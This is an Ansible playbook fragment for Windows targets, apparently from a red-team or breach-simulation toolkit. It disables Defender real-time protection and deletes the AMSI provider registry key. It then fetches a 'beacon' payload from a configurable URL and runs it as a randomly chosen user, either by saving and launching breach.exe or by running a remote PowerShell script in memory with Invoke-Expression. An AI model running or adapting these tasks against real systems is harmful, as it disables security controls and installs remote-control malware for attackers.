---
- name: Setting random user
  set_fact:
    rand_user: '{{ pick_user }}'

- name: User
  debug:
    var: rand_user

### Defender, AMSI is a hard bypass that u need admin for, a reboot will put this back!
- name: Disabling Defender on {{ inventory_hostname }}
  ansible.windows.win_powershell:
    script: |      
          Set-MpPreference -DisableRealtimeMonitoring $true
          Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
  when: defender == false

- name: Create directory structure
  ansible.windows.win_file:
    path: '{{ item }}'
    state: directory
  loop:
    - C:\users\{{ rand_user }}
    - C:\users\{{ rand_user }}\Documents

### EXE
- name: Download {{ beacon_url }} to {{ rand_user }} Documents folder
  ansible.windows.win_get_url:
    url: '{{ beacon_url }}'
    dest: C:/Users/{{ rand_user }}/Documents/breach.exe
  when: beacon_type == "EXE"

### EXE
- name: Powershell - Execute {{ beacon_url }} on {{ inventory_hostname }} - EXE
  ansible.windows.win_powershell:
    script: |
       C:/Users/{{ rand_user}}/Documents/breach.exe
  async: 10
  poll: 0
  become: yes
  become_user: '{{ NetBIOS }}\{{ rand_user }}'
  become_method: runas
  when: beacon_type == "EXE"

### PS1
- name: Powershell - IEX {{ beacon_url }} on {{ inventory_hostname }} - PS1
  ansible.windows.win_powershell:
    script: |
          Invoke-Expression(Invoke-WebRequest {{ beacon_url }} -UseBasicParsing)
  async: 10
  poll: 0
  become: yes
  become_user: '{{ NetBIOS }}\{{ rand_user }}'
  become_method: runas
  when: beacon_type == "PS1"
